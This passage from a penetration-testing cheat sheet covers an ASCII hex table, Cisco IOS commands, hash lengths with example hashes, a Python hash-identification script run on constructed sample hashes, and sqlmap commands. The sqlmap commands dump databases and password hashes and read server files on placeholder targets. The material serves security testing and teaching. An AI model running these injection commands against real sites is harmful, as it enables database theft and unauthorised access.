| x4d | M |
| x4e | N |
| x4f | O |
| x50 | P |
| x51 | Q |
| x52 | R |
| x53 | S |
| x54 | T |
| x55 | U |
| x56 | V |
| x57 | W |
| x58 | X |
| x59 | Y |
| x5a | Z |
| x5b | [ |
| x5c | \ |
| x5d | ] |
| x5e | ^ |
| x5f | _ |
| x60 | ` |
| x61 | a |
| x62 | b |
| x63 | c |
| x64 | d |
| x65 | e |
| x66 | f |
| x67 | g |
| x68 | h |
| x69 | i |
| x6a | j |
| x6b | k |
| x6c | l |
| x6d | m |
| x6e | n |
| x6f | o |
| x70 | p |
| x71 | q |
| x72 | r |
| x73 | s |
| x74 | t |
| x75 | u |
| x76 | v |
| x77 | w |
| x78 | x |
| x79 | y |
| x7a | z |
CISCO IOS Commands
A collection of useful Cisco IOS commands.
| Command | Description |
|---|---|
| enable | Enters enable mode |
| conf t | Short for, configure terminal |
| (config)# interface fa0/0 | Configure FastEthernet 0/0 |
| (config-if)# ip addr 0.0.0.0 255.255.255.255 | Add ip to fa0/0 |
| (config-if)# line vty 0 4 | Configure vty line |
| (config-line)# login | Cisco set telnet password |
| (config-line)# password YOUR-PASSWORD | Set telnet password |
| # show running-config | Show running config loaded in memory |
| # show startup-config | Show startup config |
| # show version | Show cisco IOS version |
| # show session | Display open sessions |
| # show ip interface | Show network interfaces |
| # show interface e0 | Show detailed interface info |
| # show ip route | Show routes |
| # show access-lists | Show access lists |
| # dir file systems | Show available files |
| # dir all-filesystems | File information |
| # dir /all | Show deleted files |
| # terminal length 0 | No limit on terminal output |
| # copy running-config tftp | Copies running config to tftp server |
| # copy running-config startup-config | Copy running-config to startup-config |
Cryptography
Hash Lengths
| Hash | Size |
|---|---|
| MD5 Hash Length | 16 Bytes |
| SHA-1 Hash Length | 20 Bytes |
| SHA-256 Hash Length | 32 Bytes |
| SHA-512 Hash Length | 64 Bytes |
Hash Examples
Likely just use hash-identifier for this but here are some example hashes:
| Hash | Example |
|---|---|
| MD5 Hash Example | 8743b52063cd84097a65d1633f5c74f5 |
| MD5 $PASS:$SALT Example | 01dfae6e5d4d90d9892622325959afbe:7050461 |
| MD5 $SALT:$PASS | f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 |
| SHA1 Hash Example | b89eaac7e61417341b710b727768294d0e6a277b |
| SHA1 $PASS:$SALT | 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 |
| SHA1 $SALT:$PASS | cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 |
| SHA-256 | 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 |
| SHA-256 $PASS:$SALT | c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 |
| SHA-256 $SALT:$PASS | eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 |
| SHA-512 | 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f |
| SHA-512 $PASS:$SALT | e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd |
| SHA-512 $SALT:$PASS | 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a |
| NTLM Hash Example | b4b9b02e6f09a9bd760f388b67351e2b |
Identify HASH and crack password using Wireshark: guide here
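The Hash Lengths table is the basis of length-based identification, and the examples above show its limit: MD5 and NTLM are both 16 bytes, so the length alone cannot separate them, which is why hash-identifier (or john's `--format`) is still needed. As an added example that is not part of the original cheat sheet, the Python below classifies a bare hex digest, a `hash:salt` pair or a 13-character descrypt string and runs over a small hash file. The hash file is constructed from the example hashes above plus one made-up descrypt string (`abJnggxhB/yWI`), not a real dump.

```python
import re
from typing import List, Optional, Tuple

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
# Traditional DES crypt(3): 13 characters from the ./0-9A-Za-z alphabet (john's "descrypt").
DESCRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")

# Digest size in bytes -> algorithms of that size, from the Hash Lengths table above.
# MD5 and NTLM share a 16-byte length, so length alone cannot tell them apart.
BY_BYTES = {16: ["MD5", "NTLM"], 20: ["SHA-1"], 32: ["SHA-256"], 64: ["SHA-512"]}


def identify_hash(token: str) -> Tuple[List[str], Optional[str]]:
    """Return (candidate algorithms, salt) for a hex digest, 'hex:salt' or descrypt string."""
    token = token.strip()
    if DESCRYPT_RE.match(token):
        return ["descrypt"], None
    digest, _, salt = token.partition(":")
    if not HEX_RE.match(digest) or len(digest) % 2:
        return [], None                    # not a hex digest made of whole bytes
    return list(BY_BYTES.get(len(digest) // 2, [])), (salt or None)


def triage_file(text: str) -> List[Tuple[str, List[str], Optional[str]]]:
    """Identify every non-empty line of a hash file (one hash per line, john style)."""
    return [(line, *identify_hash(line)) for line in text.splitlines() if line.strip()]


# Constructed hash file: example hashes from the table above plus one made-up descrypt string.
SAMPLE_HASH_FILE = """\
8743b52063cd84097a65d1633f5c74f5
01dfae6e5d4d90d9892622325959afbe:7050461
b89eaac7e61417341b710b727768294d0e6a277b
abJnggxhB/yWI
not-a-hash
"""


if __name__ == "__main__":
    for line, algos, salt in triage_file(SAMPLE_HASH_FILE):
        print(f"{line:45} {algos or ['unknown']} salt={salt}")
```

The salt is returned separately because john and hashcat need to know whether the digest was built as $PASS:$SALT or $SALT:$PASS, and that order is not recoverable from the string; try both formats if the source is unknown.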
SQLMap Examples
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
| Command | Description |
|---|---|
| sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 | Automated sqlmap scan |
| sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php" | Targeted sqlmap scan |
| sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump | Scan url for union + error based injection with mysql backend and use a random user agent + database dump |
| sqlmap -o -u "http://meh.com/form/" --forms | sqlmap check form for injection |
| sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump | sqlmap dump and crack hashes for table users on database-name. |
Source:
This article originally appeared on Penetration Testing Tools Cheat Sheet.
